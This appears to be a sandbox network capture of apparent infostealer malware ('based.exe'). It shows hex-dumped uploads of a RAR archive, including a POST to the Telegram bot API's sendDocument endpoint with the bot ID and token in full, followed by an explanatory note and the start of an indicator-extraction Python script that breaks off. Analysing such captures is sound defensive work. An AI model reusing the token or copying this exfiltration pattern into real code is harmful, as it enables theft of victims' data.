                                                                                                                                                          2024-05-09 15:48:15 UTC16384OUTData Raw: 59 9e 05 73 a1 69 1e 76 79 5f 8b 76 17 a1 eb 11 41 33 f3 bf 5b 67 08 01 40 ba 23 a3 a7 04 53 8f 62 32 33 13 c7 2f 93 56 89 5b ae 5a ab d8 91 ab 5d d3 4c 89 cc 76 d0 74 9a 51 49 f4 ec 8d 8b a4 b1 cc 90 4f 21 da da a8 56 72 97 a1 41 25 0f dd 9b e4 da f4 bf 57 56 b6 16 2b 86 68 81 f1 65 6d 18 2b 1f cb 19 42 bf a9 93 2c 30 d1 91 63 23 d7 2e 08 23 a0 ef 4c 96 85 de 4a 74 63 8d f5 8c 2a 0c d1 b0 e7 a6 1b 25 7f a0 9d 2f 3e 91 fc 1c b2 1b 55 4a fe d9 30 01 b8 2e a2 e0 a4 26 6f 9e 72 d5 88 89 7e c1 55 d0 0c 14 f0 09 a9 0b 44 40 8f 30 46 9c 5f ad fe 62 86 2f 1a f8 fb 24 09 c6 0c 1b 24 09 0b d1 3b 20 56 4a b2 2d 65 b5 6b 06 01 58 8c a5 1c 14 e1 19 37 2f 0b 2a 1c 0e b5 c8 b7 8c d5 8d 40 5a e7 8a 87 19 94 67 97 d4 60 0b 0a 87 10 2b 83 fc f9 36 0a 76 ce d7 92 0b 01 72
                                                                                                                                                          Data Ascii: Ysivy_vA3[g@#Sb23/V[Z]LvtQIO!VrA%WV+hem+B,0c#.#LJtc*%/>UJ0.&or~UD@0F_b/$$; VJ-ekX7/*@Zg`+6vr
                                                                                                                                                          2024-05-09 15:48:15 UTC16384OUTData Raw: 79 49 3a d3 29 0f c6 42 ed 15 5a 1e d6 d5 6f ec 6d c5 de f0 e2 dd 03 29 56 01 cb 4f f0 28 75 9c 9e d4 22 5a 2f 2f 28 55 77 20 0e f2 45 fc 4f ac 9d 5a 4c a9 5c 2e 50 b6 bc 78 fa db 2b f0 8f ea 1f 8c 4c d0 7b 28 d1 95 4d aa 87 30 06 d4 33 83 f6 08 0a ba 06 9e 85 f6 cc 15 fe 34 d6 df 3b 7e 8d fd c8 66 bb f5 d0 68 e9 b5 ea 67 8f 0e 35 63 0e 23 92 34 e3 7b 7b 08 f1 7d 93 7a 6d 60 b4 f1 0e 08 01 4c 1c 15 40 7c 1f d9 0e af c8 54 1c a3 30 21 86 5d 94 c5 88 98 99 7a 29 b2 a3 95 01 4c 64 1b 83 66 3c 21 f5 1c ce db 30 06 57 e8 65 82 09 7f fa c1 5a 14 8b 1f ae ef 32 54 9d a9 4b 0d 16 87 74 dd 5d 0a 00 9c 19 4f b6 d1 21 48 df f2 2e 42 ae fb 76 c8 23 bc 83 7d 83 d1 2b 70 19 36 1f d6 ce c5 8d 0f af 2e 6f d4 b8 03 a9 40 53 46 86 0d 59 06 5b 63 e7 42 33 cf f8 94 ea fa 04
                                                                                                                                                          Data Ascii: yI:)BZom)VO(u"Z//(Uw EOZL\.Px+L{(M034;~fhg5c#4{{}zm`L@|T0!]z)Ldf<!0WeZ2TKt]O!H.Bv#}+p6.o@SFY[cB3
                                                                                                                                                          2024-05-09 15:48:15 UTC16384OUTData Raw: 27 91 24 66 31 af 9a 95 fd cf 92 08 c7 4b b2 53 79 f9 b5 49 e1 29 ca 97 fb 4e 89 be ab 3d fe 9e 17 3a 70 37 16 ca 00 d6 d8 2a b9 1b 51 99 98 61 e7 ba 98 bd 02 4a df 94 d8 ef b5 b9 e5 de a9 5a 4c 5e b3 11 94 10 49 12 bd 9a 41 ff b7 28 90 63 7b 56 5a 9d 85 70 91 ce 49 e9 78 34 26 35 02 8d 03 f2 71 67 8b 51 62 b8 47 90 0b a4 c2 e3 9c b1 29 29 07 7e 7b f4 99 13 92 7a 02 f5 96 bb e9 11 3a bc dd 7e d2 e2 83 c0 f2 a3 5c ba c8 9c 9e 14 16 a5 2c 6d 22 23 54 b9 5c 7d 2e d2 f0 ea cc e4 dd e7 6a 40 4b 66 ae 8b 35 f3 df 16 fa c0 aa 58 d6 4d 61 8c bc be 49 8d c7 48 13 3b e2 2e f3 fb fa 7d 5b 9d db d7 9e b2 a5 ff 96 d0 b2 55 10 ae a9 c9 a1 da a3 a6 2d 8d 39 64 fc 09 58 7c f5 b0 13 91 72 cf df ca f2 13 e3 dc f0 cc 26 b8 c7 df 37 53 c9 7b b7 13 a7 7f 4b 0f 3b 30 b7 2d ec
                                                                                                                                                          Data Ascii: '$f1KSyI)N=:p7*QaJZL^IA(c{VZpIx4&5qgQbG))~{z:~\,m"#T\}.j@Kf5XMaIH;.}[U-9dX|r&7S{K;0-
                                                                                                                                                          2024-05-09 15:48:15 UTC16384OUTData Raw: b6 fd 01 28 ec ed 9f b1 ea a7 c9 7f 3f 4c 5f 32 01 ea 4c 6d 00 db 52 f9 a0 1d d3 27 26 76 8f c8 22 e3 48 79 f9 cb 5a aa ce 65 37 55 94 f6 b3 4d b7 42 f1 bf 1b 60 0c da d2 fc ef 01 37 11 d4 56 0d d1 5e 41 98 42 fd 61 ab c7 e8 80 70 c3 5f 80 e0 6d 37 40 42 d7 ea 9c 73 ae 78 be a2 3e 2b 43 af 82 87 05 4c ff ab ac a6 29 20 d1 e9 f3 76 ea 6e cc f8 54 8f e1 df a3 07 eb b5 25 5a d8 b1 fa b9 7b 77 09 7b cb 4a 7f 41 51 85 08 28 bb 9f 30 4e 17 ce a5 4b 35 a5 e3 43 1c 32 fe 64 55 e7 fd fc 15 4f bf 17 87 7d 8b a6 6b 21 43 29 5c 69 7a 5d c8 0f a1 8d 21 a7 02 dd d7 8f 4d e4 ac dd 3c 7e 0b 8c d1 9c b9 ee 6d 1e f8 bc 51 1a de 8e 3c f0 b1 d8 b6 f1 87 ed b5 98 40 7d 84 af 88 d0 f7 61 08 51 29 bd 56 df ae bb 74 69 f2 58 8e 51 f2 ba 5c 6c 7a 7f d3 26 5c 1d 21 22 34 a7 76 29
                                                                                                                                                          Data Ascii: (?L_2LmR'&v"HyZe7UMB`7V^ABap_m7@Bsx>+CL) vnT%Z{w{JAQ(0NK5C2dUO}k!C)\iz]!M<~mQ<@}aQ)VtiXQ\lz&\!"4v)
                                                                                                                                                          2024-05-09 15:48:15 UTC16384OUTData Raw: 93 63 7f 3c 39 e4 be ec 2d b5 a5 82 1a 4c cd 98 41 f5 96 67 61 92 20 c7 aa 0b 34 42 d2 ec 82 54 d2 74 ba 1c 52 ff 34 60 a1 a3 e1 15 95 00 89 8e fe 86 c8 73 de ca 8b 6f 80 1c 14 d8 b1 18 36 d3 06 d7 f6 0c 19 cd 6b 0d 62 5d c2 ac 3d 46 62 bf ce 36 16 c0 d8 44 c5 8d 74 9b fe df 8c 15 b3 b8 2a 83 9a 10 8a 66 91 40 02 68 ec 78 32 c8 b8 2e 79 2b bf 52 e6 1c 2a bf 4f 05 24 45 75 80 80 f6 db 71 ce 2a 09 17 eb a8 9d 36 bb fe 10 c9 24 57 4f 6e cd 20 a2 52 0a 8b 7c 2d 5f 5f e1 02 82 c5 95 10 6b b5 23 63 45 09 fa 4c 0b 83 2a db 5d 49 1c 82 4b 36 cb d3 1d c0 ba cf 4a 89 ee 66 f0 61 a2 f4 7b 7e 92 db 5f 64 e1 b9 f0 9d ed 27 9b 21 35 6b f3 ac 5c 6e 96 74 0c 00 72 e9 65 42 1d 27 37 d9 45 ef 17 1f 7a 3e 93 95 6f 4f 7a 81 c6 38 a4 8a 82 10 9e d5 4c 98 5b b3 1c 82 dd cd f8
                                                                                                                                                          Data Ascii: c<9-LAga 4BTtR4`so6kb]=Fb6Dt*f@hx2.y+R*O$Euq*6$WOn R|-__k#cEL*]IK6Jfa{~_d'!5k\ntreB'7Ez>oOz8L[
                                                                                                                                                          2024-05-09 15:48:15 UTC16384OUTData Raw: 67 b9 f7 07 c8 f6 4a 80 04 90 dd 3c b0 a8 27 79 06 4a 70 2f ce 2e d8 f1 8a d8 14 e1 4c 86 c8 5b 85 1a f9 88 d7 23 d1 54 7f 2f 13 9d ef 63 ec f8 89 57 b2 20 25 59 4a de 30 d3 77 de 5f 2f 89 84 69 6c 10 45 aa 75 9c 77 51 38 e2 cf 33 37 04 7a f9 9c cb c0 c4 c7 58 01 a7 77 37 ae 6e da 2e db a9 07 66 cb 04 05 74 dd 27 42 bc ff e6 14 5a d8 bf 1c c1 34 ad e1 37 ac bb 60 ae 27 3f fe de 12 85 13 ff c5 0a 28 d6 d2 e7 5f 3c de 75 55 e8 f4 4c 31 38 e1 1e ea c3 58 68 62 bf cc ba b0 29 b8 a8 46 eb 94 69 27 67 38 b7 b5 42 81 cf ae 1e 31 90 83 bc 54 ca 0d 2f a4 a6 50 37 e8 ac 0f fc ab 01 9f 67 8b d9 31 20 d8 34 76 3b fe de e1 e6 ce 53 96 30 1f d1 3e ce 3c 5b fd d9 48 cf c1 fc 49 fc eb 78 a6 c2 ae e2 da da 1d 40 a1 bb 0d e4 81 27 64 7f af 28 fa 1d 3d 71 9f a6 9c 97 7a 93
                                                                                                                                                          Data Ascii: gJ<'yJp/.L[#T/cW %YJ0w_/ilEuwQ837zXw7n.ft'BZ47`'?(_<uUL18Xhb)Fi'g8B1T/P7g1 4v;S0><[HIx@'d(=qz
                                                                                                                                                          2024-05-09 15:48:15 UTC16384OUTData Raw: bb 6a f1 4e 6b 3f db af 2d c2 6b 4b 25 db 92 8d cd e1 5d 93 cc e7 3d 22 65 c0 ad c7 7f 20 43 f4 c9 dd 86 67 32 fe c0 bd e8 0d ad a5 32 98 c1 91 d9 a6 a2 c2 d6 33 95 3f 69 6a 3a bc bd de 62 f7 71 b1 a7 87 f9 e2 3b 04 b7 cc 82 a8 2e c9 42 ea 27 50 05 87 dd 09 53 86 4e 92 0c 2c de be 70 42 db cf 23 6b 6d fc 5e a4 d6 e9 96 be 52 9d 58 41 c7 4b 1e 45 1b 75 50 82 b0 0f 41 d1 40 21 c4 f0 9e a9 f4 25 c4 81 05 b2 b5 1e 95 81 3a 2c 33 e9 88 df 11 1e 62 37 9e 60 fe 84 91 48 e7 de cc ff 14 c1 fc 66 c0 b1 91 60 2f de f1 a7 62 c7 06 67 bd d0 15 70 7d 47 fc 93 af 9b 70 ae aa f3 4b 89 87 33 78 02 6e 80 69 2d 0c 23 ef c3 5a ec 70 a2 42 1b 73 d3 96 4b be 18 db a5 0b 94 f3 1e df b4 45 18 7a f0 87 e2 c3 06 2c 58 e7 ef 38 fe 4c 62 e3 e0 22 16 3d 90 17 45 e3 c6 8a ff 40 83 cf
                                                                                                                                                          Data Ascii: jNk?-kK%]="e Cg223?ij:bq;.B'PSN,pB#km^RXAKEuPA@!%:,3b7`Hf`/bgp}GpK3xni-#ZpBsKEz,X8Lb"=E@
2024-05-09 15:48:16 UTC | 1255 bytes | IN | HTTP/1.1 200 OK
Date: Thu, 09 May 2024 15:48:16 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: close
set-cookie: __dcfduid=8d0f189a0e1b11ef9935f6142af43071; Expires=Tue, 08-May-2029 15:48:16 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1715269697
x-ratelimit-reset-after: 1
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YC7IYdyuAal7TCWHR2wzBarLSOADOyohS0eaQhtCqmvuZjlOeoLrUGS%2FvPHyb7exQIN%2FyoB2jq%2F5E9pYSOmSHBVbQFDa%2FP0MpbQILrpNrgaMqnfXXJLill4vHjCj"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=8d0f189a0e1b11ef9935f6142af43071a3364573a435c28db6652eed36070cc203e899fbc91a38ecf1e2d875e9fc3c7e; Expires=Tue, 08-May-2029 15:48:16 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax


Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
2          | 192.168.2.5 | 49746       | 149.154.167.220 | 443              | 4292 | C:\ProgramData\Microsoft\based.exe

Timestamp | Bytes transferred | Direction | Data
2024-05-09 15:48:17 UTC | 268 bytes | OUT | POST /bot7006262545:AAG_Oybxah5yJgAPFw9HTnZfJtepO5xBob8/sendDocument HTTP/1.1
Host: api.telegram.org
Accept-Encoding: identity
Content-Length: 689033
User-Agent: python-urllib3/2.2.1
Content-Type: multipart/form-data; boundary=5975628ebf9ab97afcc0f7733f8c581f
                                                                                                                                                          2024-05-09 15:48:17 UTC16384OUTData Raw: 2d 2d 35 39 37 35 36 32 38 65 62 66 39 61 62 39 37 61 66 63 63 30 66 37 37 33 33 66 38 63 35 38 31 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 72 6f 6d 65 74 68 65 75 73 2d 61 6c 66 6f 6e 73 2e 72 61 72 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 db d5 38 19 21 04 00 00 01 0f ff ea 43 f3 17 14 86 ba 43 c9 80 8b b9 f9 8d a0 ff ec 48 1c 00 fd d0 52 82 7a b3 f7 ac be 3f e4 38 73 47 2f 2c 1b 0b dd 06 16 24 8d e9 13 30 18 fe 99 2d 51 3b 9d 91 24 21 5d 15 98 c7 55 1c 63 80 96 57 b3 7e 7c 29 63 2c 13 d3 06
                                                                                                                                                          Data Ascii: --5975628ebf9ab97afcc0f7733f8c581fContent-Disposition: form-data; name="document"; filename="Prometheus-user.rar"Content-Type: application/octet-streamRar!8!CCHRz?8sG/,$0-Q;$!]UcW~|)c,
                                                                                                                                                          2024-05-09 15:48:17 UTC16384OUTData Raw: 46 72 d3 2e 5b 0b b8 87 9d f2 e1 9b 55 b1 c7 7a 3b 91 97 4d 63 b3 a6 9f b9 13 96 61 2d b0 46 18 58 16 f2 6e 18 1e cd f6 f0 e4 78 dc 50 ee 42 ad a1 09 9c 64 e0 ab a7 34 fe e4 bb 86 a1 eb 48 dc 99 de 22 d3 ec 47 c1 21 12 af 9c b9 2d bd 19 26 ee fb 63 ec 67 80 06 6c cb ea 3f 3f ed e8 36 47 1d d7 8d 20 03 32 ed 7d f6 88 2f 9b 69 3f 93 3a cf c9 34 90 5d 34 2d a0 89 48 3e 4e 9c eb f0 45 7c 52 42 6d 11 a5 d1 5d c7 6d 5b f8 af b6 fc 1a 75 e0 be 2b d5 b8 bc 38 b3 e4 29 dd 5a 88 33 e3 63 ce 96 5c 53 3f 6a 8b e6 98 70 1a c7 43 6c eb 82 af af d2 15 30 73 76 4c 5d d8 cd e5 41 3c 12 5b 89 c8 93 3a 61 c2 a1 93 9e 3a c0 ce 7f 36 32 45 81 15 99 66 a2 9c 25 ec 71 05 94 ca 69 ee 95 44 d4 e4 f3 8b 5f d5 fc bd fa 75 41 9d 1b 7d 06 db f2 34 6a e2 9f 5a 8e 8e f6 77 3e 02 a9 32
                                                                                                                                                          Data Ascii: Fr.[Uz;Mca-FXnxPBd4H"G!-&cgl??6G 2}/i?:4]4-H>NE|RBm]m[u+8)Z3c\S?jpCl0svL]A<[:a:62Ef%qiD_uA}4jZw>2
                                                                                                                                                          2024-05-09 15:48:17 UTC16384OUTData Raw: 77 45 3a d2 d6 b9 78 00 85 7a da ca 46 4b 15 c1 b7 b7 08 ee b7 7d 8d 5e 36 19 c5 3a 5a 96 6c 03 cd d8 ed 95 70 8d 14 33 ae 5b 77 5d 08 06 e1 db 12 df a6 4b 63 27 8e 21 fd 9b 79 3d 15 91 bb ea 15 fd 85 80 61 83 f8 57 02 3b 91 10 de 2b a5 e4 50 f4 6a e3 4e e1 ef 57 03 61 9f 9f c7 92 ad dd d8 aa b0 3c 1c e5 6d c0 ff 29 da 99 c3 6d bd 68 97 f1 48 b7 8b 7b e7 2c 66 e2 20 d2 40 ec b8 2a 5b 62 b5 3f be ea 6e 54 62 89 40 ba d8 41 77 78 0c c6 18 af f0 98 ad ae c3 55 b2 3b 0b 80 b6 75 a7 15 b0 4a dd db ce a7 1a 4f 77 8e 29 1b 03 94 31 8d a2 a3 ad 62 be d5 79 f4 5d ee 1d b4 57 c0 2c 91 e9 7b a8 cf d4 10 7a 33 0d f5 e4 7a 34 73 b8 77 a8 bd 07 d4 41 e5 cd d4 42 67 e2 3b de a4 53 27 92 c3 e1 d2 5b c4 26 6a 64 d1 a7 cd 13 44 4f 69 14 a6 69 f4 6f 0d dc 4e da c6 5b 76 c4
                                                                                                                                                          Data Ascii: wE:xzFK}^6:Zlp3[w]Kc'!y=aW;+PjNWa<m)mhH{,f @*[b?nTb@AwxU;uJOw)1by]W,{z3z4swABg;S'[&jdDOiioN[v
                                                                                                                                                          2024-05-09 15:48:17 UTC16384OUTData Raw: 5a 18 05 70 59 9e 05 73 a1 69 1e 76 79 5f 8b 76 17 a1 eb 11 41 33 f3 bf 5b 67 08 01 40 ba 23 a3 a7 04 53 8f 62 32 33 13 c7 2f 93 56 89 5b ae 5a ab d8 91 ab 5d d3 4c 89 cc 76 d0 74 9a 51 49 f4 ec 8d 8b a4 b1 cc 90 4f 21 da da a8 56 72 97 a1 41 25 0f dd 9b e4 da f4 bf 57 56 b6 16 2b 86 68 81 f1 65 6d 18 2b 1f cb 19 42 bf a9 93 2c 30 d1 91 63 23 d7 2e 08 23 a0 ef 4c 96 85 de 4a 74 63 8d f5 8c 2a 0c d1 b0 e7 a6 1b 25 7f a0 9d 2f 3e 91 fc 1c b2 1b 55 4a fe d9 30 01 b8 2e a2 e0 a4 26 6f 9e 72 d5 88 89 7e c1 55 d0 0c 14 f0 09 a9 0b 44 40 8f 30 46 9c 5f ad fe 62 86 2f 1a f8 fb 24 09 c6 0c 1b 24 09 0b d1 3b 20 56 4a b2 2d 65 b5 6b 06 01 58 8c a5 1c 14 e1 19 37 2f 0b 2a 1c 0e b5 c8 b7 8c d5 8d 40 5a e7 8a 87 19 94 67 97 d4 60 0b 0a 87 10 2b 83 fc f9 36 0a 76 ce d7
                                                                                                                                                          Data Ascii: ZpYsivy_vA3[g@#Sb23/V[Z]LvtQIO!VrA%WV+hem+B,0c#.#LJtc*%/>UJ0.&or~UD@0F_b/$$; VJ-ekX7/*@Zg`+6v
                                                                                                                                                          2024-05-09 15:48:17 UTC16384OUTData Raw: 98 04 75 a0 79 49 3a d3 29 0f c6 42 ed 15 5a 1e d6 d5 6f ec 6d c5 de f0 e2 dd 03 29 56 01 cb 4f f0 28 75 9c 9e d4 22 5a 2f 2f 28 55 77 20 0e f2 45 fc 4f ac 9d 5a 4c a9 5c 2e 50 b6 bc 78 fa db 2b f0 8f ea 1f 8c 4c d0 7b 28 d1 95 4d aa 87 30 06 d4 33 83 f6 08 0a ba 06 9e 85 f6 cc 15 fe 34 d6 df 3b 7e 8d fd c8 66 bb f5 d0 68 e9 b5 ea 67 8f 0e 35 63 0e 23 92 34 e3 7b 7b 08 f1 7d 93 7a 6d 60 b4 f1 0e 08 01 4c 1c 15 40 7c 1f d9 0e af c8 54 1c a3 30 21 86 5d 94 c5 88 98 99 7a 29 b2 a3 95 01 4c 64 1b 83 66 3c 21 f5 1c ce db 30 06 57 e8 65 82 09 7f fa c1 5a 14 8b 1f ae ef 32 54 9d a9 4b 0d 16 87 74 dd 5d 0a 00 9c 19 4f b6 d1 21 48 df f2 2e 42 ae fb 76 c8 23 bc 83 7d 83 d1 2b 70 19 36 1f d6 ce c5 8d 0f af 2e 6f d4 b8 03 a9 40 53 46 86 0d 59 06 5b 63 e7 42 33 cf f8
                                                                                                                                                          Data Ascii: uyI:)BZom)VO(u"Z//(Uw EOZL\.Px+L{(M034;~fhg5c#4{{}zm`L@|T0!]z)Ldf<!0WeZ2TKt]O!H.Bv#}+p6.o@SFY[cB3
                                                                                                                                                          2024-05-09 15:48:17 UTC16384OUTData Raw: 84 c4 03 9a 27 91 24 66 31 af 9a 95 fd cf 92 08 c7 4b b2 53 79 f9 b5 49 e1 29 ca 97 fb 4e 89 be ab 3d fe 9e 17 3a 70 37 16 ca 00 d6 d8 2a b9 1b 51 99 98 61 e7 ba 98 bd 02 4a df 94 d8 ef b5 b9 e5 de a9 5a 4c 5e b3 11 94 10 49 12 bd 9a 41 ff b7 28 90 63 7b 56 5a 9d 85 70 91 ce 49 e9 78 34 26 35 02 8d 03 f2 71 67 8b 51 62 b8 47 90 0b a4 c2 e3 9c b1 29 29 07 7e 7b f4 99 13 92 7a 02 f5 96 bb e9 11 3a bc dd 7e d2 e2 83 c0 f2 a3 5c ba c8 9c 9e 14 16 a5 2c 6d 22 23 54 b9 5c 7d 2e d2 f0 ea cc e4 dd e7 6a 40 4b 66 ae 8b 35 f3 df 16 fa c0 aa 58 d6 4d 61 8c bc be 49 8d c7 48 13 3b e2 2e f3 fb fa 7d 5b 9d db d7 9e b2 a5 ff 96 d0 b2 55 10 ae a9 c9 a1 da a3 a6 2d 8d 39 64 fc 09 58 7c f5 b0 13 91 72 cf df ca f2 13 e3 dc f0 cc 26 b8 c7 df 37 53 c9 7b b7 13 a7 7f 4b 0f 3b
                                                                                                                                                          Data Ascii: '$f1KSyI)N=:p7*QaJZL^IA(c{VZpIx4&5qgQbG))~{z:~\,m"#T\}.j@Kf5XMaIH;.}[U-9dX|r&7S{K;
                                                                                                                                                          2024-05-09 15:48:17 UTC16384OUTData Raw: 22 6b 51 e4 b6 fd 01 28 ec ed 9f b1 ea a7 c9 7f 3f 4c 5f 32 01 ea 4c 6d 00 db 52 f9 a0 1d d3 27 26 76 8f c8 22 e3 48 79 f9 cb 5a aa ce 65 37 55 94 f6 b3 4d b7 42 f1 bf 1b 60 0c da d2 fc ef 01 37 11 d4 56 0d d1 5e 41 98 42 fd 61 ab c7 e8 80 70 c3 5f 80 e0 6d 37 40 42 d7 ea 9c 73 ae 78 be a2 3e 2b 43 af 82 87 05 4c ff ab ac a6 29 20 d1 e9 f3 76 ea 6e cc f8 54 8f e1 df a3 07 eb b5 25 5a d8 b1 fa b9 7b 77 09 7b cb 4a 7f 41 51 85 08 28 bb 9f 30 4e 17 ce a5 4b 35 a5 e3 43 1c 32 fe 64 55 e7 fd fc 15 4f bf 17 87 7d 8b a6 6b 21 43 29 5c 69 7a 5d c8 0f a1 8d 21 a7 02 dd d7 8f 4d e4 ac dd 3c 7e 0b 8c d1 9c b9 ee 6d 1e f8 bc 51 1a de 8e 3c f0 b1 d8 b6 f1 87 ed b5 98 40 7d 84 af 88 d0 f7 61 08 51 29 bd 56 df ae bb 74 69 f2 58 8e 51 f2 ba 5c 6c 7a 7f d3 26 5c 1d 21 22
                                                                                                                                                          Data Ascii: "kQ(?L_2LmR'&v"HyZe7UMB`7V^ABap_m7@Bsx>+CL) vnT%Z{w{JAQ(0NK5C2dUO}k!C)\iz]!M<~mQ<@}aQ)VtiXQ\lz&\!"
                                                                                                                                                          2024-05-09 15:48:17 UTC16384OUTData Raw: be 7a c4 15 93 63 7f 3c 39 e4 be ec 2d b5 a5 82 1a 4c cd 98 41 f5 96 67 61 92 20 c7 aa 0b 34 42 d2 ec 82 54 d2 74 ba 1c 52 ff 34 60 a1 a3 e1 15 95 00 89 8e fe 86 c8 73 de ca 8b 6f 80 1c 14 d8 b1 18 36 d3 06 d7 f6 0c 19 cd 6b 0d 62 5d c2 ac 3d 46 62 bf ce 36 16 c0 d8 44 c5 8d 74 9b fe df 8c 15 b3 b8 2a 83 9a 10 8a 66 91 40 02 68 ec 78 32 c8 b8 2e 79 2b bf 52 e6 1c 2a bf 4f 05 24 45 75 80 80 f6 db 71 ce 2a 09 17 eb a8 9d 36 bb fe 10 c9 24 57 4f 6e cd 20 a2 52 0a 8b 7c 2d 5f 5f e1 02 82 c5 95 10 6b b5 23 63 45 09 fa 4c 0b 83 2a db 5d 49 1c 82 4b 36 cb d3 1d c0 ba cf 4a 89 ee 66 f0 61 a2 f4 7b 7e 92 db 5f 64 e1 b9 f0 9d ed 27 9b 21 35 6b f3 ac 5c 6e 96 74 0c 00 72 e9 65 42 1d 27 37 d9 45 ef 17 1f 7a 3e 93 95 6f 4f 7a 81 c6 38 a4 8a 82 10 9e d5 4c 98 5b b3 1c
                                                                                                                                                          Data Ascii: zc<9-LAga 4BTtR4`so6kb]=Fb6Dt*f@hx2.y+R*O$Euq*6$WOn R|-__k#cEL*]IK6Jfa{~_d'!5k\ntreB'7Ez>oOz8L[
                                                                                                                                                          2024-05-09 15:48:17 UTC16384OUTData Raw: 09 7b 17 ba 67 b9 f7 07 c8 f6 4a 80 04 90 dd 3c b0 a8 27 79 06 4a 70 2f ce 2e d8 f1 8a d8 14 e1 4c 86 c8 5b 85 1a f9 88 d7 23 d1 54 7f 2f 13 9d ef 63 ec f8 89 57 b2 20 25 59 4a de 30 d3 77 de 5f 2f 89 84 69 6c 10 45 aa 75 9c 77 51 38 e2 cf 33 37 04 7a f9 9c cb c0 c4 c7 58 01 a7 77 37 ae 6e da 2e db a9 07 66 cb 04 05 74 dd 27 42 bc ff e6 14 5a d8 bf 1c c1 34 ad e1 37 ac bb 60 ae 27 3f fe de 12 85 13 ff c5 0a 28 d6 d2 e7 5f 3c de 75 55 e8 f4 4c 31 38 e1 1e ea c3 58 68 62 bf cc ba b0 29 b8 a8 46 eb 94 69 27 67 38 b7 b5 42 81 cf ae 1e 31 90 83 bc 54 ca 0d 2f a4 a6 50 37 e8 ac 0f fc ab 01 9f 67 8b d9 31 20 d8 34 76 3b fe de e1 e6 ce 53 96 30 1f d1 3e ce 3c 5b fd d9 48 cf c1 fc 49 fc eb 78 a6 c2 ae e2 da da 1d 40 a1 bb 0d e4 81 27 64 7f af 28 fa 1d 3d 71 9f a6
                                                                                                                                                          Data Ascii: {gJ<'yJp/.L[#T/cW %YJ0w_/ilEuwQ837zXw7n.ft'BZ47`'?(_<uUL18Xhb)Fi'g8B1T/P7g1 4v;S0><[HIx@'d(=q
                                                                                                                                                          2024-05-09 15:48:17 UTC16384OUTData Raw: f4 58 4d a9 bb 6a f1 4e 6b 3f db af 2d c2 6b 4b 25 db 92 8d cd e1 5d 93 cc e7 3d 22 65 c0 ad c7 7f 20 43 f4 c9 dd 86 67 32 fe c0 bd e8 0d ad a5 32 98 c1 91 d9 a6 a2 c2 d6 33 95 3f 69 6a 3a bc bd de 62 f7 71 b1 a7 87 f9 e2 3b 04 b7 cc 82 a8 2e c9 42 ea 27 50 05 87 dd 09 53 86 4e 92 0c 2c de be 70 42 db cf 23 6b 6d fc 5e a4 d6 e9 96 be 52 9d 58 41 c7 4b 1e 45 1b 75 50 82 b0 0f 41 d1 40 21 c4 f0 9e a9 f4 25 c4 81 05 b2 b5 1e 95 81 3a 2c 33 e9 88 df 11 1e 62 37 9e 60 fe 84 91 48 e7 de cc ff 14 c1 fc 66 c0 b1 91 60 2f de f1 a7 62 c7 06 67 bd d0 15 70 7d 47 fc 93 af 9b 70 ae aa f3 4b 89 87 33 78 02 6e 80 69 2d 0c 23 ef c3 5a ec 70 a2 42 1b 73 d3 96 4b be 18 db a5 0b 94 f3 1e df b4 45 18 7a f0 87 e2 c3 06 2c 58 e7 ef 38 fe 4c 62 e3 e0 22 16 3d 90 17 45 e3 c6 8a
                                                                                                                                                          Data Ascii: XMjNk?-kK%]="e Cg223?ij:bq;.B'PSN,pB#km^RXAKEuPA@!%:,3b7`Hf`/bgp}GpK3xni-#ZpBsKEz,X8Lb"=E
2024-05-09 15:48:21 UTC | 389 bytes | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Thu, 09 May 2024 15:48:21 GMT
Content-Type: application/json
Content-Length: 1700
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
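Both uploads in this section are plain multipart/form-data POSTs: the first session sends the archive as a part named "file", the second calls sendDocument on api.telegram.org with a part named "document", and in each case the first 16384-byte chunk already contains the part headers and the archive signature (52 61 72 21 1a 07 01 00, the RAR5 magic). The script below is an added example, not code from the sample or from Joe Sandbox: given a captured request head and the first body chunk, it pulls out what a responder needs to block and report, namely the Telegram bot id and token, the API method, the multipart boundary, the field name, the filename, and the payload type judged from its magic bytes. The sample input is constructed from the request head shown above and from the decoded "Data Raw" hex of the first chunk; note that the hex decodes the filename as Prometheus-alfons.rar while the "Data Ascii" column renders it as Prometheus-user.rar, so the example works from the hex.

```python
import re
from dataclasses import dataclass
from typing import Dict, Optional

# Archive signatures an exfiltrated blob is likely to start with.
MAGIC = {
    b"Rar!\x1a\x07\x01\x00": "RAR5",
    b"Rar!\x1a\x07\x00": "RAR4",
    b"PK\x03\x04": "ZIP",
    b"7z\xbc\xaf\x27\x1c": "7z",
}
TELEGRAM_PATH_RE = re.compile(r"^/bot(\d+):([A-Za-z0-9_-]+)/(\w+)$")
BOUNDARY_RE = re.compile(r'boundary="?([^";]+)"?', re.I)
DISPOSITION_RE = re.compile(r'name="([^"]*)"(?:;\s*filename="([^"]*)")?', re.I)


@dataclass
class ExfilIndicators:
    method: str
    path: str
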